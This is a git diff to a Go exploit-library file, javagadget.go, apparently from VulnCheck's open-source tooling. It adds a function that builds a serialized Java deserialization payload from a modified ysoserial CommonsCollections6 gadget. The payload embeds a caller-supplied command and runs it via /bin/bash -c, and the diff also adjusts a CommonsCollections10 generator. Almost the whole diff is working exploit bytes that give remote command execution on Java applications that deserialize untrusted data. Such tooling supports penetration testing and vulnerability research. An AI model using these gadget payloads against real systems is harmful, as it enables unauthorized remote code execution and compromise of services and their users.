vulncheck-oss · terrorbyte · Mar 20, 2025 · Mar 20, 2025 · Mar 20, 2025 · Mar 20, 2025
diff --git a/java/javagadget.go b/java/javagadget.go
@@ -15,10 +15,139 @@ func ErrorInvalidCommandLength(msg string) error {
 	return fmt.Errorf("%w: %s", errInvalidCommandLength, msg)
 }
 
-// the allocated space (255).
-func Commons11CommandBytecode(commandStr string) ([]byte, error) {
+// This payload was generated using ysoserial-modified with the CommonsCollections6 gadget and the bash shell arg
+// The benefit of this payload over one generated from the unmodified ysoserial is the you do not need to
+// prepend it with a bash -c, and the spaces do not need to be replaced with $IFS.
+// It also solves redirection issues that are present in unmodified ysoserial payloads.
+// This payload will always run the provided command using bash, hence the name.
+// That said you should not need, nor should you prepend a <shell> -c to commandStr parameter passed here.
+func Commons6ModifiedBashCommandBytecode(commandStr string) (string, error) {
 	if len(commandStr) > 255 || len(commandStr) < 1 {
-		return []byte{}, ErrorInvalidCommandLength("command must be between 1 and 255 characters")
+		return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters")
+	}
+
+	payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61" +
+		"\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65" +
+		"\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00" +
+		"\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00" +
+		"\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e" +
+		"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f" +
+		"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f" +
+		"\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e" +
+		"\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79" +
+		"\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c" +
+		"\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76" +
+		"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63" +
+		"\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c" +
+		"\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61" +
+		"\x70\x3b\x78\x70\x74\x00\x03\x66\x6f\x6f\x73\x72" +
+		"\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65" +
+		"\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c" +
+		"\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70" +
+		"\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82" +
+		"\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61" +
+		"\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67" +
+		"\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d" +
+		"\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69" +
+		"\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72" +
+		"\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72" +
+		"\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d" +
+		"\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74" +
+		"\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72" +
+		"\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61" +
+		"\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec" +
+		"\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54" +
+		"\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74" +
+		"\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63" +
+		"\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63" +
+		"\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54" +
+		"\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78" +
+		"\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61" +
+		"\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e" +
+		"\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e" +
+		"\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65" +
+		"\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00" +
+		"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f" +
+		"\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f" +
+		"\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63" +
+		"\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f" +
+		"\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54" +
+		"\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76" +
+		"\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09" +
+		"\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x71\x00\x7e" +
+		"\x00\x03\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61" +
+		"\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d" +
+		"\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+		"\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70" +
+		"\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73" +
+		"\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73" +
+		"\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e" +
+		"\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f" +
+		"\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38" +
+		"\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74" +
+		"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e" +
+		"\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b" +
+		"\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74" +
+		"\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" +
+		"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69" +
+		"\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00" +
+		"\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" +
+		"\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00" +
+		"\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67" +
+		"\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f" +
+		"\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00" +
+		"\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69" +
+		"\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61" +
+		"\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b" +
+		"\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78" +
+		"\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d" +
+		"\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1b\x00" +
+		"\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e" +
+		"\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0" +
+		"\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70" +
+		"\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x13" +
+		"\x75\x71\x00\x7e\x00\x18\x00\x00\x00\x02\x70\x75" +
+		"\x71\x00\x7e\x00\x18\x00\x00\x00\x00\x74\x00\x06" +
+		"\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1b" +
+		"\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61" +
+		"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74" +
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78" +
+		"\x70\x76\x71\x00\x7e\x00\x18\x73\x71\x00\x7e\x00" +
+		"\x13\x75\x71\x00\x7e\x00\x18\x00\x00\x00\x01\x75" +
+		"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61" +
+		"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2" +
+		"\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00" +
+		"\x00\x00\x03\x74\x00\x09\x2f\x62\x69\x6e\x2f\x62" +
+		"\x61\x73\x68\x74\x00\x02\x2d\x63\x74\x00\xff" +
+
+		// 255 characters were allocated, we just put back the unused
+		// length as spaces
+		commandStr + strings.Repeat(" ", 0xff-len(commandStr)) +
+
+		"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00" +
+		"\x7e\x00\x1b\x00\x00\x00\x01\x76\x71\x00\x7e\x00" +
+		"\x2c\x73\x71\x00\x7e\x00\x0f\x73\x72\x00\x11\x6a" +
+		"\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74" +
+		"\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38" +
+		"\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78" +
+		"\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67" +
+		"\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b" +
+		"\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01" +
+		"\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69" +
+		"\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda" +
+		"\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c" +
+		"\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09" +
+		"\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f" +
+		"\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00" +
+		"\x10\x00\x00\x00\x00\x78\x78\x78"
+
+	return payloadBytes, nil
+}
+
+// Generated using ysoserial with CommonsCollections10
+func Commons10CommandBytecode(commandStr string) (string, error) {
+	if len(commandStr) > 255 || len(commandStr) < 1 {
+		return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters")
 	}
 
 	payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61" +
@@ -283,7 +412,7 @@ func Commons11CommandBytecode(commandStr string) ([]byte, error) {
 		"\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08" +
 		"\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"
 
-	return []byte(payloadBytes), nil
+	return payloadBytes, nil
 }
 
 // This is a serialized java reverse shell. The gadget was generated by ysoserial